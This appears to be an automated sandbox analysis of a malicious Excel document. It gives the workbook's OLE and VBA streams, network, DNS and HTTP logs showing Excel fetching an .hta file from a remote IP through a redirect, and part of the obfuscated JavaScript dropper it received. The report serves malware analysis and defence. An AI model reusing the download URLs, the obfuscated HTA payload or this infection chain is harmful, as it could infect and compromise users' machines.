          CLSID:
          File Type:data
          Stream Size:744
          Entropy:5.677200951472466
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . ` . . . y . . . K . \\ . . . h . t . t . p . s . : . / . / . c . u . r . t . . . w . i . z . . . c . o . / . f . 0 . O . 8 . J . N . 5 . 2 . 9 . 8 . ? . & . l . e . t . t . e . r . = . m . u . d . d . y . & . g . o . b . b . l . e . r . = . t . i . r . e . s . o . m . e . & . n . e . x . u . s . . . . ( Y ? . p . . { & 4 . v . . . T ` . . . n N z ) . J ^ . . e \\ . a " . g . w b r . . + | t . : . . R ? B . $ L ; : q 2 > 3 v k X . x # D D % 6 r . x L . f 1 H H ~ c O . % . X
          Data Raw:01 00 00 02 bd bc c0 06 96 8f b5 7f 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 5c 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 63 00 75 00 72 00 74 00 2e 00 77 00 69 00 7a 00 2e 00 63 00 6f 00 2f 00 66 00 30 00 4f 00 38 00 4a 00 4e 00 35 00 32 00 39 00 38 00 3f 00 26 00 6c 00 65 00 74 00 74 00 65 00 72 00 3d 00 6d 00
          General
          Stream Path:Workbook
          CLSID:
          File Type:Applesoft BASIC program data, first line number 16
          Stream Size:320222
          Entropy:7.998542413720984
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . J . . s . h . 1 . @ . . P . M V k . . . F . . . . . . . t . . . \\ . p . . \\ . . V @ ' P . , B . Q . . Y . e . . & . W X , Y ! . s . / y A . . 7 . X % w l = [ ! . . { . . R ; , . . . w P % B . . . D . a . . . W . . . = . . . ; 1 Y . . . . . . 6 ; ^ n K = . . . . . . . . / . . . . . ; . . . . . . . 6 . . . . = . . . _ I l ] . + 2 b . @ . . . . . . . . . " . . . R . . . . k A . . . - . . . . 1 . . . . . l . ^ . N g 9 . 9 k s . 1 T 1 . . . . 6 . . . b .
          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 4a 09 fe d5 1e b9 f0 73 14 68 07 31 15 b7 87 8e 40 1e 0c ad 50 d4 eb b5 8a bb 93 4d 56 97 6b 97 d8 16 f4 95 9c 12 86 14 91 8f b0 46 c0 85 99 ef e1 00 02 00 b0 04 c1 00 02 00 8e 74 e2 00 00 00 5c 00 70 00 9e 16 99 b9 ed 5c b8 da 0a dd f3 0b 56 40 27 50 9b 11 2c 42 19 e3 51 0f 00 59 16 65 82 ce
          General
          Stream Path:_VBA_PROJECT_CUR/PROJECT
          CLSID:
          File Type:ASCII text, with CRLF line terminators
          Stream Size:529
          Entropy:5.201958896797205
          Base64 Encoded:True
          Data ASCII:I D = " { 3 C 3 E 0 3 D 8 - 2 5 B 3 - 4 0 8 0 - 9 F 1 4 - E 1 B 0 F 1 D 1 0 F 4 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 3 9 1 5 A 0 8 A 8 0 C A 8 0 C A
          Data Raw:49 44 3d 22 7b 33 43 33 45 30 33 44 38 2d 32 35 42 33 2d 34 30 38 30 2d 39 46 31 34 2d 45 31 42 30 46 31 44 31 30 46 34 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
          General
          Stream Path:_VBA_PROJECT_CUR/PROJECTwm
          CLSID:
          File Type:data
          Stream Size:104
          Entropy:3.0488640812019017
          Base64 Encoded:False
          Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
          Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
          TimestampSource PortDest PortSource IPDest IP
          Dec 18, 2024 15:02:01.403667927 CET49840443192.168.2.5170.82.173.30
          Dec 18, 2024 15:02:01.403704882 CET44349840170.82.173.30192.168.2.5
          Dec 18, 2024 15:02:01.403804064 CET49840443192.168.2.5170.82.173.30
          Dec 18, 2024 15:02:01.404047012 CET49840443192.168.2.5170.82.173.30
          Dec 18, 2024 15:02:01.404061079 CET44349840170.82.173.30192.168.2.5
          Dec 18, 2024 15:02:02.811327934 CET44349840170.82.173.30192.168.2.5
          Dec 18, 2024 15:02:02.811563015 CET49840443192.168.2.5170.82.173.30
          Dec 18, 2024 15:02:02.816873074 CET49840443192.168.2.5170.82.173.30
          Dec 18, 2024 15:02:02.816890001 CET44349840170.82.173.30192.168.2.5
          Dec 18, 2024 15:02:02.817321062 CET44349840170.82.173.30192.168.2.5
          Dec 18, 2024 15:02:02.817420959 CET49840443192.168.2.5170.82.173.30
          Dec 18, 2024 15:02:02.817985058 CET49840443192.168.2.5170.82.173.30
          Dec 18, 2024 15:02:02.863329887 CET44349840170.82.173.30192.168.2.5
          Dec 18, 2024 15:02:04.428230047 CET44349840170.82.173.30192.168.2.5
          Dec 18, 2024 15:02:04.428507090 CET49840443192.168.2.5170.82.173.30
          Dec 18, 2024 15:02:04.428514004 CET44349840170.82.173.30192.168.2.5
          Dec 18, 2024 15:02:04.428565025 CET49840443192.168.2.5170.82.173.30
          Dec 18, 2024 15:02:04.428569078 CET44349840170.82.173.30192.168.2.5
          Dec 18, 2024 15:02:04.428592920 CET44349840170.82.173.30192.168.2.5
          Dec 18, 2024 15:02:04.428606033 CET49840443192.168.2.5170.82.173.30
          Dec 18, 2024 15:02:04.428632021 CET49840443192.168.2.5170.82.173.30
          Dec 18, 2024 15:02:04.452263117 CET49840443192.168.2.5170.82.173.30
          Dec 18, 2024 15:02:04.452279091 CET44349840170.82.173.30192.168.2.5
          Dec 18, 2024 15:02:04.452290058 CET49840443192.168.2.5170.82.173.30
          Dec 18, 2024 15:02:04.452332973 CET49840443192.168.2.5170.82.173.30
          Dec 18, 2024 15:02:04.453995943 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:04.573764086 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:04.573957920 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:04.574106932 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:04.693823099 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.662332058 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.662372112 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.662410021 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.662480116 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.662514925 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.662543058 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.662552118 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.662590981 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.662631989 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.662658930 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.662688017 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.662723064 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.662744999 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.662759066 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.662775040 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.662811995 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.783657074 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.783698082 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.783731937 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.783771992 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.854180098 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.854274035 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.854420900 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.854485035 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.858417988 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.858494997 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.858540058 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.858598948 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.866826057 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.866899014 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.866909027 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.866959095 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.875267029 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.875360012 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.875372887 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.875426054 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.883594036 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.883654118 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.883668900 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.883718014 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.892390966 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.892447948 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.892496109 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.892549038 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.895786047 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.895831108 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.900423050 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.900480032 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.900523901 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.900569916 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.908878088 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.908932924 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.908932924 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.908987999 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.917305946 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.917368889 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.917428970 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.917474985 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.925699949 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.925751925 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.925755978 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.925818920 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.934462070 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.934526920 CET8049851173.214.167.74192.168.2.5
          Dec 18, 2024 15:02:05.934535027 CET4985180192.168.2.5173.214.167.74
          Dec 18, 2024 15:02:05.934593916 CET4985180192.168.2.5173.214.167.74
          TimestampSource PortDest PortSource IPDest IP
          Dec 18, 2024 15:02:00.136840105 CET6058753192.168.2.51.1.1.1
          Dec 18, 2024 15:02:01.342391968 CET53605871.1.1.1192.168.2.5
          Dec 18, 2024 15:02:01.401011944 CET6058753192.168.2.51.1.1.1
          Dec 18, 2024 15:02:01.538614035 CET53605871.1.1.1192.168.2.5
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Dec 18, 2024 15:02:00.136840105 CET192.168.2.51.1.1.10x47eStandard query (0)curt.wiz.coA (IP address)IN (0x0001)false
          Dec 18, 2024 15:02:01.401011944 CET192.168.2.51.1.1.10x47eStandard query (0)curt.wiz.coA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Dec 18, 2024 15:01:09.897232056 CET1.1.1.1192.168.2.50x4423No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
          Dec 18, 2024 15:01:09.897232056 CET1.1.1.1192.168.2.50x4423No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
          Dec 18, 2024 15:02:01.342391968 CET1.1.1.1192.168.2.50x47eNo error (0)curt.wiz.cocurt.wiz.co.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
          Dec 18, 2024 15:02:01.342391968 CET1.1.1.1192.168.2.50x47eNo error (0)curt.wiz.co.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
          Dec 18, 2024 15:02:01.342391968 CET1.1.1.1192.168.2.50x47eNo error (0)curt.wiz.co.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
          Dec 18, 2024 15:02:01.538614035 CET1.1.1.1192.168.2.50x47eNo error (0)curt.wiz.cocurt.wiz.co.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
          Dec 18, 2024 15:02:01.538614035 CET1.1.1.1192.168.2.50x47eNo error (0)curt.wiz.co.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
          Dec 18, 2024 15:02:01.538614035 CET1.1.1.1192.168.2.50x47eNo error (0)curt.wiz.co.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
          Dec 18, 2024 15:02:09.777592897 CET1.1.1.1192.168.2.50xecNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
          Dec 18, 2024 15:02:09.777592897 CET1.1.1.1192.168.2.50xecNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
          Dec 18, 2024 15:02:13.359337091 CET1.1.1.1192.168.2.50x2638No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
          Dec 18, 2024 15:02:13.359337091 CET1.1.1.1192.168.2.50x2638No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
          • curt.wiz.co
          • 173.214.167.74
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.549851173.214.167.74805044C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          TimestampBytes transferredDirectionData
          Dec 18, 2024 15:02:04.574106932 CET268OUTGET /xampp/dcv/greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta HTTP/1.1
          Accept: */*
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
          Connection: Keep-Alive
          Host: 173.214.167.74
          Dec 18, 2024 15:02:05.662332058 CET1236INHTTP/1.1 200 OK
          Date: Wed, 18 Dec 2024 14:02:05 GMT
          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
          Last-Modified: Wed, 18 Dec 2024 00:54:55 GMT
          ETag: "24058-62980dcb22508"
          Accept-Ranges: bytes
          Content-Length: 147544
          Keep-Alive: timeout=5, max=100
          Connection: Keep-Alive
          Content-Type: application/hta
          Data Raw: 3c 53 63 72 69 70 74 20 4c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 73 63 72 69 70 74 27 3e 0d 0a 3c 21 2d 2d 20 48 54 4d 4c 20 45 6e 63 72 79 70 74 69 6f 6e 20 70 72 6f 76 69 64 65 64 20 62 79 20 74 75 66 61 74 2e 63 6f 6d 20 2d 2d 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 25 36 38 25 37 34 25 36 44 25 36 43 25 33 45 25 30 41 25 33 43 25 36 38 25 36 35 25 36 31 25 36 34 25 33 45 25 30 41 25 33 43 25 32 46 25 36 38 25 36 35 25 36 31 25 36 34 25 33 45 25 30 41 25 33 43 25 36 32 25 36 46 25 36 34 25 37 39 25 33 45 25 30 41 25 30 41 25 33 43 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 30 25 37 34 25 37 39 25 37 30 25 36 35 25 33 44 25 32 32 25 37 34 25 36 35 25 37 38 25 37 34 25 32 46 25 36 41 25 36 31 25 37 36 25 36 31 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 32 25 33 45 25 30 41 25 33 43 25 32 31 25 32 44 25 32 44 25 32 30 25 30 41 25 36 35 25 37 36 25 36 31 25 36 43 25 32 38 25 37 35 25 36 45 25 36 [TRUNCATED]
          Data Ascii: <Script Language='Javascript'>... HTML Encryption provided by tufat.com -->...document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%20%0A%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%27%25%36%36%25%37%35%25%36%65%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%32%30%25%36%32%25%33%36%25%33%31%25%33%34%25%33%32%25%33%31%25%32%38%25%37%33%25%32%39%25%32%30%25%37%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%32%25%32%30%25%33%64%25%32%30%25%32%32%25%32%32%25%33%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%34%25%36%64%25%37%30%25%32%30%25%33%64%25%32%30%25%37%33%25%32%65%25%37%33%25%37%30%25%36%63%25%36%39%25%37%34%25%32%38%25%32%32%25%33%32%25%33%33%25%33%33%25%33%34%25%33%30%25%33%38%25%33%31%25%33%
          Dec 18, 2024 15:02:05.662372112 CET1236INData Raw: 33 37 25 32 35 25 33 32 25 33 32 25 32 35 25 33 32 25 33 39 25 32 35 25 33 33 25 36 32 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 33 39 25 32 35 25 33 37 25 33 33 25 32 35 25 33 32 25 33 30 25 32 35 25 33 33 25 36 34 25 32 35 25 33 32 25 33
          Data Ascii: 37%25%32%32%25%32%39%25%33%62%25%30%61%25%30%39%25%37%33%25%32%30%25%33%64%25%32%30%25%37%35%25%36%65%25%36%35%25%37%33%25%36%33%25%36%31%25%37%30%25%36%35%25%32%38%25%37%34%25%36%64%25%37%30%25%35%62%25%33%30%25%35%64%25%32%39%25%33%62%25%30%
          Dec 18, 2024 15:02:05.662410021 CET1236INData Raw: 32 35 25 33 32 25 36 35 25 32 35 25 33 36 25 33 33 25 32 35 25 33 36 25 33 38 25 32 35 25 33 36 25 33 31 25 32 35 25 33 37 25 33 32 25 32 35 25 33 34 25 33 31 25 32 35 25 33 37 25 33 34 25 32 35 25 33 32 25 33 38 25 32 35 25 33 36 25 33 39 25 32
          Data Ascii: 25%32%65%25%36%33%25%36%38%25%36%31%25%37%32%25%34%31%25%37%34%25%32%38%25%36%39%25%32%35%25%36%62%25%32%65%25%36%63%25%36%35%25%36%65%25%36%37%25%37%34%25%36%38%25%32%39%25%32%39%25%35%65%25%37%33%25%32%65%25%36%33%25%36%38%25%36%31%25%37%32%
          Dec 18, 2024 15:02:05.662480116 CET1236INData Raw: 36 35 25 32 35 25 33 36 25 33 37 25 32 35 25 33 36 25 33 36 25 32 35 25 33 31 25 36 33 25 32 35 25 33 31 25 33 39 25 32 35 25 33 35 25 33 38 25 32 35 25 33 36 25 36 32 25 32 35 25 33 36 25 33 31 25 32 35 25 33 36 25 33 39 25 32 35 25 33 36 25 33
          Data Ascii: 65%25%36%37%25%36%36%25%31%63%25%31%39%25%35%38%25%36%62%25%36%31%25%36%39%25%36%31%25%36%31%25%36%65%25%33%66%25%31%65%25%34%34%25%34%36%25%33%39%25%34%32%25%36%65%25%37%31%25%36%66%25%35%61%25%36%65%25%36%38%25%34%35%25%34%37%25%33%30%25%31%
          Dec 18, 2024 15:02:05.662514925 CET1236INData Raw: 32 35 25 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 33 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 33 33 25 32 35 25 33 30 25 33 37 25 32 35 25 33 30 25 33 34 25 32 35 25 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32
          Data Ascii: 25%30%32%25%30%35%25%30%63%25%30%35%25%30%33%25%30%37%25%30%34%25%30%32%25%30%35%25%30%36%25%30%32%25%30%35%25%30%63%25%30%32%25%30%35%25%30%63%25%30%35%25%30%33%25%30%37%25%30%34%25%30%32%25%30%35%25%30%36%25%30%32%25%30%35%25%30%63%25%30%32%
          Dec 18, 2024 15:02:05.662552118 CET1236INData Raw: 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 33 36 25 32 35 25 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 33 25 32 35 25 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 33 25 32 35 25 33
          Data Ascii: 30%32%25%30%35%25%30%36%25%30%32%25%30%35%25%30%63%25%30%32%25%30%35%25%30%63%25%30%35%25%30%33%25%30%37%25%30%34%25%30%32%25%30%35%25%30%36%25%30%32%25%30%35%25%30%63%25%30%32%25%30%35%25%30%63%25%30%35%25%30%33%25%30%37%25%30%34%25%30%32%25%
          Dec 18, 2024 15:02:05.662590981 CET1236INData Raw: 33 37 25 32 35 25 33 35 25 33 36 25 32 35 25 33 35 25 33 35 25 32 35 25 33 34 25 36 35 25 32 35 25 33 37 25 33 31 25 32 35 25 33 36 25 33 34 25 32 35 25 33 35 25 33 34 25 32 35 25 33 36 25 33 39 25 32 35 25 33 36 25 33 31 25 32 35 25 33 35 25 33
          Data Ascii: 37%25%35%36%25%35%35%25%34%65%25%37%31%25%36%34%25%35%34%25%36%39%25%36%31%25%35%35%25%36%32%25%36%38%25%37%34%25%34%64%25%33%35%25%36%64%25%34%61%25%34%32%25%33%65%25%36%39%25%34%31%25%34%65%25%34%66%25%36%66%25%35%62%25%35%33%25%34%37%25%33%
          Dec 18, 2024 15:02:05.662688017 CET1236INData Raw: 32 35 25 33 30 25 33 36 25 32 35 25 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 33 25 32 35 25 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 33 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 33 33 25 32
          Data Ascii: 25%30%36%25%30%32%25%30%35%25%30%63%25%30%32%25%30%35%25%30%63%25%30%35%25%30%33%25%30%37%25%30%34%25%30%32%25%30%35%25%30%36%25%30%32%25%30%35%25%30%63%25%30%32%25%30%35%25%30%63%25%30%35%25%30%33%25%30%37%25%30%34%25%30%32%25%30%35%25%30%36%
          Dec 18, 2024 15:02:05.662723064 CET1236INData Raw: 33 30 25 33 35 25 32 35 25 33 30 25 33 33 25 32 35 25 33 30 25 33 37 25 32 35 25 33 30 25 33 34 25 32 35 25 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 33 36 25 32 35 25 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33
          Data Ascii: 30%35%25%30%33%25%30%37%25%30%34%25%30%32%25%30%35%25%30%36%25%30%32%25%30%35%25%30%63%25%30%32%25%30%35%25%30%63%25%30%35%25%30%33%25%30%37%25%30%34%25%30%32%25%30%35%25%30%36%25%30%32%25%30%35%25%30%63%25%30%32%25%30%35%25%30%63%25%30%35%25%
          Dec 18, 2024 15:02:05.662759066 CET1236INData Raw: 33 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 33 25 32 35 25 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 33 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 33 33 25 32 35 25 33 30 25 33 37 25 32 35 25 33 30 25 33
          Data Ascii: 32%25%30%35%25%30%63%25%30%32%25%30%35%25%30%63%25%30%35%25%30%33%25%30%37%25%30%34%25%30%32%25%30%35%25%30%36%25%30%32%25%30%35%25%30%63%25%30%32%25%30%35%25%30%63%25%30%35%25%30%33%25%30%37%25%30%34%25%30%32%25%30%35%25%30%36%25%30%32%25%30%
          Dec 18, 2024 15:02:05.783657074 CET1236INData Raw: 32 35 25 33 30 25 33 37 25 32 35 25 33 30 25 33 34 25 32 35 25 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 33 36 25 32 35 25 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 33 25 32 35 25 33 30 25 33 32 25 32
          Data Ascii: 25%30%37%25%30%34%25%30%32%25%30%35%25%30%36%25%30%32%25%30%35%25%30%63%25%30%32%25%30%35%25%30%63%25%30%35%25%30%33%25%36%62%25%36%33%25%37%34%25%35%31%25%36%31%25%37%35%25%34%30%25%36%35%25%36%31%25%36%61%25%36%62%25%34%37%25%37%36%25%35%63%


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.549840170.82.173.304435044C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          TimestampBytes transferredDirectionData
          2024-12-18 14:02:02 UTC236OUTGET /f0O8JN5298?&letter=muddy&gobbler=tiresome&nexus HTTP/1.1
          Accept: */*
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
          Host: curt.wiz.co
          Connection: Keep-Alive
          2024-12-18 14:02:04 UTC995INHTTP/1.1 302 Found
          Date: Wed, 18 Dec 2024 14:02:04 GMT
          Content-Type: text/plain; charset=utf-8
          Content-Length: 120
          Connection: close
          Set-Cookie: sess=123; path=/; Secure; HttpOnly
          Location: http://173.214.167.74/xampp/dcv/greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta
          Strict-Transport-Security: max-age=31536000; includeSubDomains
          x-ms-middleware-request-id: 00000000-0000-0000-0000-000000000000
          X-DNS-Prefetch-Control: off
          X-Frame-Options: SAMEORIGIN
          X-Download-Options: noopen
          X-Content-Type-Options: nosniff
          X-XSS-Protection: 1; mode=block
          Content-Security-Policy: default-src 'self' 'unsafe-inline' ; font-src *;img-src * data:; script-src * 'unsafe-inline' ; style-src * 'unsafe-inline';
          Referrer-Policy: strict-origin
          Permissions-Policy: accelerometer=(self), ambient-light-sensor=(), battery=(self), camera=(self), geolocation=(self), gyroscope=(self), microphone=(self), usb=(self), gamepad=(), speaker-selection=()
          X-GoCache-CacheStatus: BYPASS
          2024-12-18 14:02:04 UTC120INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 33 2e 32 31 34 2e 31 36 37 2e 37 34 2f 78 61 6d 70 70 2f 64 63 76 2f 67 72 65 61 74 69 6e 64 69 61 6e 63 6f 6d 70 61 6e 69 65 73 67 69 76 65 6e 62 65 73 74 67 69 66 74 66 6f 72 79 6f 75 72 68 65 61 6c 74 68 67 69 76 65 6e 67 6f 6f 64 72 65 74 75 72 6e 73 2e 68 74 61
          Data Ascii: Found. Redirecting to http://173.214.167.74/xampp/dcv/greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta


          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Click to jump to process

          Target ID:0
          Start time:09:01:00
          Start date:18/12/2024
          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          Wow64 process (32bit):true
          Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
          Imagebase:0xb70000
          File size:53'161'064 bytes
          MD5 hash:4A871771235598812032C822E6F68F19
          Has elevated privileges:true
          Has administrator privileges:true
